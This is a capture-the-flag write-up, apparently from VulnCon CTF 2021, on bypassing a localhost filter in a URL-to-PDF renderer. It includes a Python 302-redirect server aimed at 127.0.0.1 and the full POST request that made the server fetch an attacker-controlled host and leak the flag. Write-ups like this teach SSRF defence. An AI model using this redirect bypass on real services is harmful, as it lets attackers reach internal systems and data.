This challenge involved a website that allowed users to specify a URL to
render as a PDF. This  
essential acts as a way to perform SSRF. However, any address such as
`127.0.0.1` or other encoded  
forms are rejected.

To get around this, we simply use redirect headers on our own server. I simply
reused this [code snippet](https://book.hacktricks.xyz/pentesting-web/ssrf-
server-side-request-forgery#bypass-via-redirect):

```python  
#!/usr/bin/env python3

#python3 ./redirector.py 8000 http://127.0.0.1/

import sys  
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv)-1 != 2:  
print("Usage: {} <port_number> <url>".format(sys.argv[0]))  
sys.exit()

class Redirect(BaseHTTPRequestHandler):  
def do_GET(self):  
self.send_response(302)  
self.send_header('Location', sys.argv[2])  
self.end_headers()

HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()  
```

This was invoked with `python redirector.py 80 http://127.0.0.1`.

The following request was sent to the challenge server to trigger the redirect
to localhost.

```  
POST /convert HTTP/1.1  
Host: 143.244.132.186:3000  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36  
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 29  
Origin: http://143.244.132.186:3000  
Connection: close  
Referer: http://143.244.132.186:3000/  
Upgrade-Insecure-Requests: 1

target=http://attacker.sg.pwn

```

The resultant PDF document that gets rendered contains:

```  
Welcome back to home admin! Here is your Flag: VULNCON{W3lc0me_b4ck_t0_h0m3}  
```

**Flag:** `VULNCON{W3lc0me_b4ck_t0_h0m3}`

Original writeup (https://nandynarwhals.org/vulncon-ctf-2021/#website-shot).